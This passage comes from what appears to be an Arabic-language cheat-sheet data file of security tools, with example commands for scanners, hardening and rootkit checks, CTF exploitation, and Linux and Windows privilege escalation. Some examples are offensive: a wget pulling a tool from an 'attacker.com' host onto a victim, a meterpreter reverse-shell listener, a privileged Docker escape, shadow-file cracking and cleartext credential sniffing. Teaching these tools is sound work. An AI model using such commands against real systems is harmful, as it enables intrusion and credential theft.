    { flag: 'parasite6 INTERFACE', desc: 'اعتراض حركة IPv6' },
    { flag: 'flood_router6 INTERFACE', desc: 'فيضان إعلانات Router' },
    { flag: 'dnsdict6 -d DOMAIN', desc: 'فحص DNS لـ IPv6' },
  ],
  examples: [
    { cmd: 'alive6 eth0', desc: 'اكتشاف أجهزة IPv6 في الشبكة' },
    { cmd: 'nmap -6 -sV target_ipv6_address', desc: 'فحص IPv6 بـ Nmap' },
    { cmd: 'ping6 ff02::1%eth0', desc: 'Ping Multicast لكل أجهزة IPv6' },
    { cmd: 'ip -6 addr show', desc: 'عرض عناوين IPv6 المحلية' },
  ],
  tips: '💡 كثير من الأنظمة تُشغّل IPv6 بشكل غير مقصود. اكتشفه.',
  related: ['nmap', 'scapy', 'hping3'],
},

// ─── VULNERABILITY SCANNING ───────────────────────
{
  id: 926, name: 'openvas', cat: 'network', level: 'advanced',
  syntax: '# Web: https://localhost:9392',
  short: 'ماسح ثغرات شامل مفتوح المصدر',
  desc: `OpenVAS (Greenbone Vulnerability Scanner) ماسح ثغرات شامل مفتوح المصدر. يفحص الشبكات والأنظمة ويُنتج تقارير تفصيلية عن الثغرات مع CVEs والحلول. بديل مفتوح لـ Nessus.`,
  options: [
    { flag: 'gvm-start', desc: 'تشغيل GVM/OpenVAS' },
    { flag: '# Scan Configs:', desc: 'Full and Fast, System Discovery' },
    { flag: '# Reports:', desc: 'XML, HTML, PDF' },
  ],
  examples: [
    { cmd: 'sudo apt install gvm -y && sudo gvm-setup', desc: 'التثبيت والإعداد' },
    { cmd: 'sudo gvm-start', desc: 'تشغيل الخدمات' },
    { cmd: '# افتح: https://localhost:9392', desc: 'واجهة الويب' },
    { cmd: 'sudo openvas -V', desc: 'فحص الإصدار' },
  ],
  tips: '💡 gvm-setup يأخذ وقتاً طويلاً عند أول تشغيل لتحديث قاعدة الثغرات.',
  related: ['nessus', 'nmap', 'nikto'],
},
{
  id: 927, name: 'nuclei', cat: 'web', level: 'intermediate',
  syntax: 'nuclei -u TARGET -t templates/',
  short: 'ماسح ثغرات سريع بقوالب مجتمعية',
  desc: `Nuclei ماسح ثغرات Go سريع يستخدم قوالب YAML مجتمعية (5000+ قالب). يكتشف: ثغرات CVE، إعدادات خاطئة، Exposed Files، Default Credentials، وأكثر.`,
  options: [
    { flag: '-u URL', desc: 'هدف واحد' },
    { flag: '-l urls.txt', desc: 'قائمة أهداف' },
    { flag: '-t templates/', desc: 'مجلد القوالب' },
    { flag: '-severity critical,high', desc: 'تصفية بالخطورة' },
    { flag: '-o output.txt', desc: 'حفظ النتائج' },
  ],
  examples: [
    { cmd: 'nuclei -u https://target.com', desc: 'فحص شامل بكل القوالب' },
    { cmd: 'nuclei -u https://target.com -severity critical,high', desc: 'الثغرات الحرجة فقط' },
    { cmd: 'nuclei -l urls.txt -t cves/ -o results.txt', desc: 'فحص CVEs على قائمة URLs' },
    { cmd: 'nuclei -u target.com -t exposed-panels/', desc: 'لوحات الإدارة المكشوفة' },
  ],
  tips: '💡 nuclei -update-templates لتحديث القوالب.',
  related: ['nmap', 'nikto', 'metasploit'],
},
{
  id: 928, name: 'vulnscan-nmap', cat: 'network', level: 'intermediate',
  syntax: 'nmap --script vuln TARGET',
  short: 'فحص الثغرات بـ Nmap Scripts',
  desc: `Nmap Scripting Engine (NSE) يحتوي على مئات السكريبتات للكشف عن الثغرات. استخدم --script vuln لفحص شامل، أو scripts محددة لثغرات معينة.`,
  options: [
    { flag: '--script vuln', desc: 'كل سكريبتات الثغرات' },
    { flag: '--script smb-vuln*', desc: 'ثغرات SMB' },
    { flag: '--script ssl-*', desc: 'ثغرات SSL/TLS' },
    { flag: '--script http-*', desc: 'ثغرات HTTP' },
    { flag: '--script-args USER=admin,PASS=pass', desc: 'تمرير معاملات' },
  ],
  examples: [
    { cmd: 'nmap --script vuln 192.168.1.10', desc: 'فحص ثغرات شامل' },
    { cmd: 'nmap --script smb-vuln-ms17-010 -p 445 192.168.1.10', desc: 'فحص EternalBlue' },
    { cmd: 'nmap --script ssl-heartbleed -p 443 192.168.1.10', desc: 'فحص Heartbleed' },
    { cmd: 'nmap --script http-sql-injection target.com', desc: 'SQL Injection عبر HTTP' },
  ],
  tips: '💡 nmap --script-help vuln لمعرفة وصف كل سكريبت.',
  related: ['nmap', 'nuclei', 'openvas'],
},

// ─── SECURE CODING & DEFENSE ──────────────────────
{
  id: 929, name: 'lynis', cat: 'system', level: 'intermediate',
  syntax: 'lynis audit system',
  short: 'تدقيق أمني لأنظمة Linux/Unix',
  desc: `Lynis أداة تدقيق أمني مفتوحة المصدر لأنظمة Linux/Unix/macOS. تفحص إعدادات النظام، الخدمات، الشبكة، الحسابات وتُقدم توصيات لتقوية الأمن (Hardening).`,
  options: [
    { flag: 'audit system', desc: 'تدقيق النظام الكامل' },
    { flag: '--quick', desc: 'فحص سريع' },
    { flag: '--no-colors', desc: 'بدون ألوان (للـ Log)' },
    { flag: '--upload', desc: 'رفع النتائج للـ Lynis Cloud' },
  ],
  examples: [
    { cmd: 'sudo lynis audit system', desc: 'تدقيق شامل للنظام' },
    { cmd: 'sudo lynis audit system --quick 2>&1 | tee lynis.log', desc: 'مع حفظ التقرير' },
    { cmd: 'sudo lynis show commands', desc: 'عرض الأوامر المتاحة' },
    { cmd: 'sudo lynis audit system --tests-from-group malware', desc: 'فحص Malware فقط' },
  ],
  tips: '💡 اهتم بالعناصر ذات الـ [WARNING] و[SUGGESTION] لتقوية النظام.',
  related: ['openvas', 'nmap', 'chkrootkit'],
},
{
  id: 930, name: 'chkrootkit', cat: 'forensics', level: 'intermediate',
  syntax: 'sudo chkrootkit',
  short: 'فحص النظام عن وجود Rootkits',
  desc: `Chkrootkit يفحص نظام Linux بحثاً عن Rootkits المعروفة، Trojans، Backdoors. يُستخدم في Incident Response للتحقق من سلامة النظام بعد الاشتباه في اختراقه.`,
  options: [
    { flag: '-q', desc: 'وضع هادئ (الإيجابيات فقط)' },
    { flag: '-l', desc: 'قائمة الفحوصات المتاحة' },
    { flag: '-r /mnt', desc: 'فحص نظام ملفات بديل' },
  ],
  examples: [
    { cmd: 'sudo chkrootkit', desc: 'فحص شامل عن Rootkits' },
    { cmd: 'sudo chkrootkit -q', desc: 'إظهار النتائج الإيجابية فقط' },
    { cmd: 'sudo chkrootkit | grep -i "INFECTED"', desc: 'البحث عن النتائج المُصابة' },
    { cmd: 'sudo apt install chkrootkit -y && sudo chkrootkit', desc: 'التثبيت والتشغيل' },
  ],
  tips: '💡 شغّله من Live CD لتجنب تعديل Rootkit على النتائج.',
  related: ['rkhunter', 'lynis', 'volatility'],
},
{
  id: 931, name: 'rkhunter', cat: 'forensics', level: 'intermediate',
  syntax: 'sudo rkhunter --check',
  short: 'صياد Rootkits والبرامج الخبيثة',
  desc: `RKHunter (Rootkit Hunter) يفحص نظام Linux عن Rootkits، Backdoors، وملفات النظام المشبوهة. يقارن Hashes ملفات النظام الأساسية ويُنبه عند التغيير.`,
  options: [
    { flag: '--check', desc: 'إجراء الفحص الكامل' },
    { flag: '--update', desc: 'تحديث قاعدة البيانات' },
    { flag: '--propupd', desc: 'تحديث خصائص الملفات (بعد تحديث النظام)' },
    { flag: '--quiet', desc: 'وضع هادئ' },
  ],
  examples: [
    { cmd: 'sudo rkhunter --update && sudo rkhunter --check', desc: 'تحديث وفحص' },
    { cmd: 'sudo rkhunter --check --skip-keypress', desc: 'فحص بدون توقف' },
    { cmd: 'sudo rkhunter --list tests', desc: 'قائمة الفحوصات' },
  ],
  tips: '💡 شغّل rkhunter --propupd بعد تحديث النظام لتجنب False Positives.',
  related: ['chkrootkit', 'lynis', 'clamav'],
},
{
  id: 932, name: 'fail2ban', cat: 'system', level: 'intermediate',
  syntax: 'sudo fail2ban-client [COMMAND]',
  short: 'حماية الخوادم من Brute Force',
  desc: `Fail2Ban يُراقب ملفات اللوق ويحظر تلقائياً IPs التي تحاول Brute Force عبر iptables. يحمي SSH، FTP، HTTP وأي خدمة تكتب لوق.`,
  options: [
    { flag: 'status', desc: 'حالة الخدمة' },
    { flag: 'status sshd', desc: 'حالة Jail للـ SSH' },
    { flag: 'unban IP', desc: 'رفع الحظر عن IP' },
    { flag: 'banned', desc: 'قائمة الـ IPs المحظورة' },
  ],
  examples: [
    { cmd: 'sudo systemctl start fail2ban', desc: 'تشغيل الخدمة' },
    { cmd: 'sudo fail2ban-client status', desc: 'حالة كل Jails' },
    { cmd: 'sudo fail2ban-client status sshd', desc: 'إحصائيات حظر SSH' },
    { cmd: 'sudo fail2ban-client set sshd unbanip 192.168.1.10', desc: 'رفع حظر IP' },
    { cmd: 'sudo tail -f /var/log/fail2ban.log', desc: 'متابعة اللوق' },
  ],
  tips: '💡 عدّل /etc/fail2ban/jail.local لتخصيص معدل الحظر والمدة.',
  related: ['iptables', 'ufw', 'sshd'],
},
{
  id: 933, name: 'iptables', cat: 'system', level: 'advanced',
  syntax: 'iptables [-t table] COMMAND [options]',
  short: 'جدار الحماية والتحكم في الشبكة',
  desc: `iptables الجدار الناري الأساسي في Linux. يُتحكم في حركة الشبكة: فلترة الحزم، إعادة التوجيه (NAT)، Port Forwarding، حجب الـ IPs. أساسي في تأمين الخوادم والـ Pivoting.`,
  options: [
    { flag: '-A CHAIN', desc: 'إضافة قاعدة' },
    { flag: '-D CHAIN', desc: 'حذف قاعدة' },
    { flag: '-L -n -v', desc: 'عرض القواعد' },
    { flag: '-p tcp --dport PORT', desc: 'تحديد البروتوكول والمنفذ' },
    { flag: '-j ACCEPT|DROP|REJECT', desc: 'الإجراء' },
  ],
  examples: [
    { cmd: 'iptables -L -n -v', desc: 'عرض كل القواعد' },
    { cmd: 'iptables -A INPUT -p tcp --dport 22 -j ACCEPT', desc: 'السماح بـ SSH' },
    { cmd: 'iptables -A INPUT -s 192.168.1.0/24 -j DROP', desc: 'حجب شبكة كاملة' },
    { cmd: 'iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080', desc: 'Port Forwarding' },
    { cmd: 'iptables -F', desc: 'مسح كل القواعد (تحذير!)' },
  ],
  tips: '⚠️ iptables -F يمسح كل القواعد. استخدم ufw للإعداد السريع.',
  related: ['ufw', 'fail2ban', 'nftables'],
},

// ─── CTF TOOLS ────────────────────────────────────
{
  id: 934, name: 'pwntools', cat: 'ctf', level: 'advanced',
  syntax: 'python3 exploit.py',
  short: 'مكتبة Python لاستغلال الثنائيات وBuffer Overflow',
  desc: `Pwntools مكتبة Python لبناء Exploits والتفاعل مع الثنائيات. تُستخدم في CTF Binary Exploitation: Buffer Overflow، ROP Chains، Format String، تفاعل مع سوكيتات الشبكة.`,
  options: [
    { flag: 'from pwn import *', desc: 'استيراد المكتبة' },
    { flag: 'process("./binary")', desc: 'تشغيل ثنائي محلي' },
    { flag: 'remote("host", port)', desc: 'الاتصال بخادم CTF' },
    { flag: 'p64(addr)', desc: 'تحويل عنوان 64-bit' },
    { flag: 'cyclic(200)', desc: 'توليد Pattern لإيجاد Offset' },
  ],
  examples: [
    { cmd: 'pip3 install pwntools', desc: 'التثبيت' },
    { cmd: 'python3 -c "from pwn import *; p = process(\'./vuln\'); p.sendline(b\'A\'*200); p.interactive()"', desc: 'Buffer Overflow أساسي' },
    { cmd: 'python3 -c "from pwn import *; print(cyclic(200))"', desc: 'توليد Pattern' },
    { cmd: 'python3 -c "from pwn import *; print(cyclic_find(0x61616174))"', desc: 'إيجاد Offset من Pattern' },
  ],
  tips: '💡 استخدم pwn checksec ./binary لمعرفة حماية الثنائي.',
  related: ['gdb', 'radare2', 'ghidra'],
},
{
  id: 935, name: 'gdb-peda', cat: 'ctf', level: 'advanced',
  syntax: 'gdb -q BINARY',
  short: 'مصحح GNU مع امتداد PEDA للـ Exploitation',
  desc: `GDB مع PEDA (Python Exploit Development Assistance) يُحسّن واجهة GDB لبناء Exploits: عرض Registers، Stack، Heap، ومساعدة في إيجاد ROP Gadgets وBuffer Overflow Offsets.`,
  options: [
    { flag: 'run / r', desc: 'تشغيل البرنامج' },
    { flag: 'break *ADDRESS', desc: 'نقطة توقف' },
    { flag: 'x/20wx $esp', desc: 'فحص الـ Stack' },
    { flag: 'info registers', desc: 'محتوى الـ Registers' },
    { flag: 'checksec', desc: 'فحص حماية الثنائي (PEDA)' },
  ],
  examples: [
    { cmd: 'git clone https://github.com/longld/peda.git ~/.peda && echo "source ~/.peda/peda.py" >> ~/.gdbinit', desc: 'تثبيت PEDA' },
    { cmd: 'gdb -q ./vuln', desc: 'فتح ثنائي بـ GDB' },
    { cmd: 'pattern create 200', desc: 'توليد Pattern (PEDA)' },
    { cmd: 'pattern search', desc: 'إيجاد Offset بعد الـ Crash' },
    { cmd: 'ropgadget --binary ./vuln', desc: 'البحث عن ROP Gadgets' },
  ],
  tips: '💡 استخدم pwndbg كبديل حديث لـ PEDA.',
  related: ['pwntools', 'radare2', 'ghidra'],
},
{
  id: 936, name: 'john-formats', cat: 'password', level: 'intermediate',
  syntax: 'john --list=formats',
  short: 'صيغ Hash المدعومة بـ John the Ripper',
  desc: `John the Ripper يدعم أكثر من 400 صيغة Hash. معرفة الصيغة الصحيحة ضرورية لكسر الـ Hash بكفاءة. استخدم --list=formats لعرض كل الصيغ.`,
  options: [
    { flag: '--format=NT', desc: 'Windows NTLM Hashes' },
    { flag: '--format=md5crypt', desc: 'Linux MD5 Hashes' },
    { flag: '--format=bcrypt', desc: 'bcrypt Hashes' },
    { flag: '--format=sha512crypt', desc: 'Linux SHA-512 Hashes' },
  ],
  examples: [
    { cmd: 'john --list=formats | grep -i ntlm', desc: 'البحث عن صيغ NTLM' },
    { cmd: 'john --format=NT --wordlist=rockyou.txt hashes.txt', desc: 'كسر Windows Hashes' },
    { cmd: 'unshadow /etc/passwd /etc/shadow > combined.txt && john combined.txt', desc: 'كسر هاشات Linux' },
    { cmd: 'john --show hashes.txt', desc: 'عرض كلمات المرور المكسورة' },
  ],
  tips: '💡 unshadow يدمج passwd و shadow لتهيئة John للعمل على Linux Hashes.',
  related: ['hashcat', 'hashid', 'cyberchef'],
},
{
  id: 937, name: 'metasploit-modules', cat: 'exploitation', level: 'advanced',
  syntax: 'msfconsole> search TYPE:MODULE',
  short: 'البحث عن Modules في Metasploit',
  desc: `Metasploit يحتوي على 2000+ Module: Exploits، Payloads، Auxiliary، Post، Encoders. معرفة كيفية البحث والاستخدام تُسرّع الاختبار.`,
  options: [
    { flag: 'search type:exploit', desc: 'Exploits' },
    { flag: 'search type:auxiliary scanner', desc: 'ماسحات' },
    { flag: 'search cve:2021-34527', desc: 'بحث بـ CVE' },
    { flag: 'search platform:windows', desc: 'Modules لـ Windows' },
  ],
  examples: [
    { cmd: 'msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set LPORT 4444; run"', desc: 'Listener سريع' },
    { cmd: 'msfconsole -x "search type:exploit cve:2021-34527"', desc: 'البحث عن PrintNightmare' },
    { cmd: 'msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run"', desc: 'Port Scan بـ MSF' },
  ],
  tips: '💡 db_nmap في MSF يحفظ نتائج Nmap مباشرة في قاعدة البيانات.',
  related: ['msfvenom', 'meterpreter', 'empire'],
},

// ─── CONTAINERS & DEVOPS ──────────────────────────
{
  id: 938, name: 'docker-security', cat: 'system', level: 'intermediate',
  syntax: 'docker [COMMAND]',
  short: 'أمان Docker والحاويات',
  desc: `Docker للحاويات يحتاج تأميناً دقيقاً: فحص Images عن Vulnerabilities، منع Privilege Escalation من الحاوية للنظام المضيف، قراءة Secrets المخزنة في المتغيرات.`,
  options: [
    { flag: 'inspect CONTAINER', desc: 'معلومات كاملة عن الحاوية' },
    { flag: 'exec -it CONTAINER /bin/bash', desc: 'Shell داخل الحاوية' },
    { flag: 'cp CONTAINER:/path /local', desc: 'نسخ ملفات من الحاوية' },
    { flag: 'history IMAGE', desc: 'تاريخ بناء Image' },
  ],
  examples: [
    { cmd: 'docker inspect container_name | grep -i "env\\|secret\\|pass"', desc: 'البحث عن Secrets في متغيرات البيئة' },
    { cmd: 'docker history --no-trunc image_name | grep -i "pass\\|secret"', desc: 'Secrets في تاريخ الـ Image' },
    { cmd: 'docker run --rm -v /:/mnt alpine chroot /mnt /bin/sh', desc: 'هروب من الحاوية (إذا كانت Privileged)' },
    { cmd: 'trivy image nginx:latest', desc: 'فحص ثغرات Image' },
  ],
  tips: '⚠️ docker run --privileged خطر جداً. يُتيح الهروب للنظام المضيف.',
  related: ['trivy', 'ScoutSuite', 'lynis'],
},
{
  id: 939, name: 'trivy', cat: 'system', level: 'intermediate',
  syntax: 'trivy image IMAGE_NAME',
  short: 'فحص ثغرات Docker Images والملفات',
  desc: `Trivy ماسح ثغرات من Aqua Security يفحص Docker Images، Filesystems، Git Repos عن CVEs والإعدادات الخاطئة. سريع وسهل الاستخدام في CI/CD.`,
  options: [
    { flag: 'image IMAGE', desc: 'فحص Docker Image' },
    { flag: 'fs /path', desc: 'فحص Filesystem' },
    { flag: 'repo URL', desc: 'فحص Git Repository' },
    { flag: '--severity CRITICAL,HIGH', desc: 'تصفية بالخطورة' },
  ],
  examples: [
    { cmd: 'trivy image nginx:latest', desc: 'فحص ثغرات Nginx Image' },
    { cmd: 'trivy image --severity CRITICAL ubuntu:20.04', desc: 'الثغرات الحرجة فقط' },
    { cmd: 'trivy fs --security-checks vuln,config .', desc: 'فحص مشروع محلي' },
    { cmd: 'trivy image --format json -o results.json my-app:latest', desc: 'حفظ نتائج JSON' },
  ],
  tips: '💡 أضف Trivy في pipeline CI/CD للكشف المبكر عن الثغرات.',
  related: ['docker-security', 'ScoutSuite', 'nuclei'],
},
{
  id: 940, name: 'git-secrets', cat: 'recon', level: 'beginner',
  syntax: 'git log --all --oneline',
  short: 'البحث عن أسرار في مستودعات Git',
  desc: `مستودعات Git تحتوي أحياناً على API Keys، كلمات مرور، مفاتيح SSH في السجل أو الـ Commits السابقة. أدوات مثل TruffleHog وGitLeaks تُشغل بحثاً آلياً.`,
  options: [
    { flag: 'git log --all -p', desc: 'كل Commits بالتفاصيل' },
    { flag: 'trufflehog filesystem .', desc: 'فحص مجلد محلي' },
    { flag: 'gitleaks detect', desc: 'كشف تلقائي عن Secrets' },
  ],
  examples: [
    { cmd: 'git log --all --oneline', desc: 'قائمة كل Commits' },
    { cmd: 'git show COMMIT_HASH', desc: 'محتوى Commit محدد' },
    { cmd: 'git log --all -p | grep -i "password\\|api_key\\|secret"', desc: 'بحث يدوي' },
    { cmd: 'trufflehog git https://github.com/target/repo', desc: 'فحص GitHub Repo' },
    { cmd: 'gitleaks detect --source . -v', desc: 'فحص تلقائي بـ Gitleaks' },
  ],
  tips: '💡 حتى لو حذفت Secret في Commit جديد، يبقى في السجل!',
  related: ['osint-framework', 'shodan-cli', 'recon-ng'],
},

// ─── ADDITIONAL TOOLS ─────────────────────────────
{
  id: 941, name: 'msf-auxiliary', cat: 'exploitation', level: 'intermediate',
  syntax: 'use auxiliary/CATEGORY/MODULE',
  short: 'Auxiliary Modules في Metasploit',
  desc: `Auxiliary Modules في Metasploit للمهام غير الاستغلالية: فحص المنافذ، Brute Force، جمع المعلومات، Fuzzing، قراءة Emails، فحص VoIP.`,
  options: [
    { flag: 'auxiliary/scanner/portscan/tcp', desc: 'فحص المنافذ' },
    { flag: 'auxiliary/scanner/smb/smb_login', desc: 'Brute Force SMB' },
    { flag: 'auxiliary/scanner/http/http_version', desc: 'تحديد إصدار HTTP Server' },
    { flag: 'auxiliary/gather/dns_enum', desc: 'تعداد DNS' },
  ],
  examples: [
    { cmd: 'use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run', desc: 'فحص شبكة كاملة' },
    { cmd: 'use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS 192.168.1.0/24; run', desc: 'فحص EternalBlue' },
    { cmd: 'use auxiliary/scanner/http/robots_txt; set RHOSTS target.com; run', desc: 'قراءة robots.txt' },
  ],
  tips: '💡 use auxiliary/scanner/ ثم اضغط Tab لعرض كل المودويلات.',
  related: ['msfconsole', 'msfvenom', 'metasploit-modules'],
},
{
  id: 942, name: 'curl-hacking', cat: 'web', level: 'beginner',
  syntax: 'curl [OPTIONS] URL',
  short: 'cURL لاختبار الويب والـ APIs',
  desc: `cURL أداة أساسية لاختبار الـ APIs وتطبيقات الويب. تُرسل HTTP Requests مخصصة: أي Method، Headers، Cookies، Data. مثالية للـ Quick Tests ولأتمتة الاختبارات.`,
  options: [
    { flag: '-X METHOD', desc: 'نوع الطلب (GET, POST, PUT, DELETE)' },
    { flag: '-H "Header: value"', desc: 'إضافة Header' },
    { flag: '-d "data"', desc: 'بيانات POST' },
    { flag: '-b "cookie"', desc: 'إرسال Cookie' },
    { flag: '-k', desc: 'تجاهل TLS Certificate' },
    { flag: '-v', desc: 'Verbose (كل التفاصيل)' },
  ],
  examples: [
    { cmd: 'curl -X GET https://api.target.com/users -H "Authorization: Bearer TOKEN"', desc: 'طلب GET مع توكن' },
    { cmd: 'curl -X POST https://target.com/login -d "user=admin&pass=password" -c cookies.txt', desc: 'تسجيل دخول وحفظ Cookies' },
    { cmd: 'curl -b cookies.txt https://target.com/admin', desc: 'طلب مع Cookies محفوظة' },
    { cmd: 'curl -v -X PUT https://api.target.com/user/1 -H "Content-Type: application/json" -d \'{"role":"admin"}\'', desc: 'تصعيد صلاحيات' },
    { cmd: 'curl -s -o /dev/null -w "%{http_code}" https://target.com/admin', desc: 'فحص كود الاستجابة فقط' },
  ],
  tips: '💡 curl -v يُظهر Headers الطلب والرد. مفيد لفهم استجابة الخادم.',
  related: ['httpx', 'burpsuite', 'wget'],
},
{
  id: 943, name: 'wget', cat: 'linux', level: 'beginner',
  syntax: 'wget [OPTIONS] URL',
  short: 'تنزيل الملفات والموارد من الويب',
  desc: `wget لتنزيل الملفات من HTTP/HTTPS/FTP. يدعم التنزيل المتواصل بعد الانقطاع، تنزيل المواقع كاملاً، وإرسال HTTP Headers مخصصة. مفيد في نقل الأدوات للضحية.`,
  options: [
    { flag: '-r', desc: 'تنزيل متكرر (موقع كامل)' },
    { flag: '-c', desc: 'إكمال تنزيل منقطع' },
    { flag: '-O FILE', desc: 'حفظ باسم محدد' },
    { flag: '--no-check-certificate', desc: 'تجاهل شهادة TLS' },
    { flag: '-q', desc: 'وضع هادئ' },
  ],
  examples: [
    { cmd: 'wget https://attacker.com/tools/linpeas.sh -O /tmp/linpeas.sh', desc: 'تنزيل أداة على الضحية' },
    { cmd: 'wget -r -np -k https://target.com', desc: 'تنزيل موقع كامل' },
    { cmd: 'wget -c http://large-file.com/file.zip', desc: 'إكمال تنزيل' },
    { cmd: 'wget --no-check-certificate https://self-signed-cert.com/file', desc: 'تجاهل شهادة خاصة' },
  ],
  tips: '💡 python3 -m http.server أسرع لنقل الأدوات على الشبكة المحلية.',
  related: ['curl-hacking', 'python3', 'scp'],
},
{
  id: 944, name: 'scp', cat: 'linux', level: 'beginner',
  syntax: 'scp [OPTIONS] source destination',
  short: 'نقل الملفات بأمان عبر SSH',
  desc: `SCP (Secure Copy Protocol) لنقل الملفات عبر SSH بشكل مشفر. يُستخدم لرفع الأدوات وتنزيل النتائج في اختبارات الاختراق.`,
  options: [
    { flag: '-r', desc: 'نسخ مجلد كامل' },
    { flag: '-P PORT', desc: 'منفذ SSH مخصص' },
    { flag: '-i KEY', desc: 'مفتاح SSH' },
    { flag: '-v', desc: 'Verbose Mode' },
  ],
  examples: [
    { cmd: 'scp file.txt user@192.168.1.10:/tmp/', desc: 'رفع ملف للخادم' },
    { cmd: 'scp user@192.168.1.10:/etc/passwd /tmp/passwd', desc: 'تنزيل ملف من الخادم' },
    { cmd: 'scp -r /local/folder user@192.168.1.10:/remote/', desc: 'رفع مجلد كامل' },
    { cmd: 'scp -P 2222 -i private_key.pem file.txt user@target:/tmp/', desc: 'مع منفذ ومفتاح مخصص' },
  ],
  tips: '💡 استخدم rsync -avz للمزامنة الذكية مع ضغط.',
  related: ['ssh', 'wget', 'curl-hacking'],
},
{
  id: 945, name: 'tcpdump-advanced', cat: 'network', level: 'advanced',
  syntax: 'sudo tcpdump -i INTERFACE [FILTERS]',
  short: 'تحليل متقدم للحزم الشبكية',
  desc: `TCPDump مع Filters متقدمة لاستخراج معلومات محددة: اعتراض Credentials بالنص الواضح، تحليل بروتوكولات، اكتشاف مسح الشبكة، واستخلاص Patterns مشبوهة.`,
  options: [
    { flag: '-A', desc: 'عرض محتوى الحزمة نصياً' },
    { flag: '-X', desc: 'عرض Hex والنص' },
    { flag: 'port 21 or port 23', desc: 'التقاط FTP و Telnet' },
    { flag: '"tcp[13] == 2"', desc: 'SYN Packets فقط' },
  ],
  examples: [
    { cmd: 'sudo tcpdump -i eth0 -A port 21 | grep -i "pass\\|user"', desc: 'اعتراض بيانات FTP' },
    { cmd: 'sudo tcpdump -i eth0 -A port 80 | grep -i "password\\|token"', desc: 'بيانات HTTP النصية' },
    { cmd: 'sudo tcpdump -i eth0 "tcp[13] == 2" -nn', desc: 'التقاط SYN Packets (مسح الشبكة)' },
    { cmd: 'sudo tcpdump -i eth0 -w /tmp/capture.pcap && tshark -r /tmp/capture.pcap -T fields -e http.authbasic', desc: 'استخراج HTTP Auth' },
  ],
  tips: '💡 tcpdump مع Wireshark: التقط بـ tcpdump وحلّل بـ Wireshark.',
  related: ['wireshark', 'tshark', 'scapy'],
},
{
  id: 946, name: 'linuxprivesc', cat: 'system', level: 'advanced',
  syntax: '# مجموعة أوامر فحص رفع الصلاحيات',
  short: 'منهجية رفع الصلاحيات في Linux',
  desc: `منهجية شاملة لرفع الصلاحيات في Linux: فحص sudo، SUID، Capabilities، Cron Jobs، ملفات كتابة، خدمات مكشوفة، كلمات مرور في الملفات، واستغلال Kernel Vulnerabilities.`,
  options: [
    { flag: 'sudo -l', desc: 'أوامر sudo المتاحة' },
    { flag: 'find / -perm -u=s', desc: 'ملفات SUID' },
    { flag: 'getcap -r / 2>/dev/null', desc: 'Linux Capabilities' },
    { flag: 'cat /etc/crontab', desc: 'Cron Jobs' },
  ],
  examples: [
    { cmd: 'sudo -l', desc: 'أول أمر: ماذا يمكنك بـ sudo؟' },
    { cmd: 'find / -perm -u=s -type f 2>/dev/null | xargs ls -la', desc: 'كل ملفات SUID' },
    { cmd: 'find / -writable -type f 2>/dev/null | grep -v proc', desc: 'ملفات يمكن الكتابة عليها' },
    { cmd: 'ps aux | grep root', desc: 'خدمات تعمل كـ root' },
    { cmd: 'cat /etc/passwd | grep bash', desc: 'مستخدمون بـ bash shell' },
    { cmd: 'env | grep -i "pass\\|key\\|secret"', desc: 'Secrets في متغيرات البيئة' },
  ],
  tips: '💡 شغّل LinPEAS أولاً لتوفير الوقت، ثم افحص يدوياً ما أشار إليه.',
  related: ['linpeas', 'gtfobins', 'winpeas'],
},
{
  id: 947, name: 'windows-privesc', cat: 'system', level: 'advanced',
  syntax: '# Windows Privilege Escalation Commands',
  short: 'منهجية رفع الصلاحيات في Windows',
  desc: `منهجية شاملة لرفع الصلاحيات في Windows: Token Impersonation، Unquoted Service Paths، AlwaysInstallElevated، Weak Service Permissions، Registry Autoruns، DLL Hijacking.`,
  options: [
    { flag: 'whoami /priv', desc: 'الصلاحيات الحالية' },
    { flag: 'whoami /groups', desc: 'المجموعات الحالية' },
    { flag: 'net user', desc: 'قائمة المستخدمين' },
    { flag: 'wmic service list', desc: 'الخدمات' },
  ],
  examples: [
    { cmd: 'whoami /priv', desc: 'فحص Privileges' },
    { cmd: 'wmic service get name,pathname | findstr /i "C:\\Program"', desc: 'Unquoted Service Paths' },
    { cmd: 'reg query HKCU\\Software\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated', desc: 'AlwaysInstallElevated' },
    { cmd: 'Get-ScheduledTask | Where-Object {$_.Principal.UserId -eq "SYSTEM"} | Format-List', desc: 'Scheduled Tasks كـ SYSTEM' },
    { cmd: 'accesschk.exe -ucqv * /accepteula', desc: 'فحص صلاحيات الخدمات' },
  ],
  tips: '💡 WinPEAS يُغطي كل هذه النقاط تلقائياً.',
  related: ['winpeas', 'meterpreter', 'powershell'],
},
{
  id: 948, name: 'smbserver', cat: 'network', level: 'intermediate',
  syntax: 'impacket-smbserver SHARE_NAME /path/to/share',
  short: 'خادم SMB لنقل الملفات في الاختبار',
  desc: `Impacket SMBServer لإنشاء خادم SMB مؤقت على Kali لنقل الملفات إلى/من Windows. أسرع من HTTP في بيئات Windows، يدعم Authentication وبدونها.`,
  options: [
    { flag: 'SHARE_NAME /path', desc: 'اسم الـ Share والمسار' },
    { flag: '-smb2support', desc: 'دعم SMB2' },
    { flag: '-username user -password pass', desc: 'مصادقة' },
  ],
  examples: [
    { cmd: 'impacket-smbserver tools /opt/tools -smb2support', desc: 'مشاركة مجلد' },
    { cmd: '# من Windows: copy \\\\KALI_IP\\tools\\nc64.exe C:\\Windows\\Temp\\', desc: 'تنزيل ملف من Windows' },
    { cmd: '# من Windows: copy C:\\Windows\\Temp\\output.txt \\\\KALI_IP\\tools\\', desc: 'رفع ملف لـ Kali' },
    { cmd: 'impacket-smbserver loot /tmp/loot -smb2support -username kali -password kali123', desc: 'مع مصادقة' },
  ],
  tips: '💡 SMBServer مثالي لنقل winpeas.exe وأدوات ما بعد الاختراق.',
  related: ['scp', 'wget', 'impacket'],
},
{
  id: 949, name: 'cme-passthehash', cat: 'exploitation', level: 'advanced',
  syntax: 'crackmapexec smb TARGET -u USER -H HASH',
  short: 'Pass-the-Hash مع CrackMapExec',
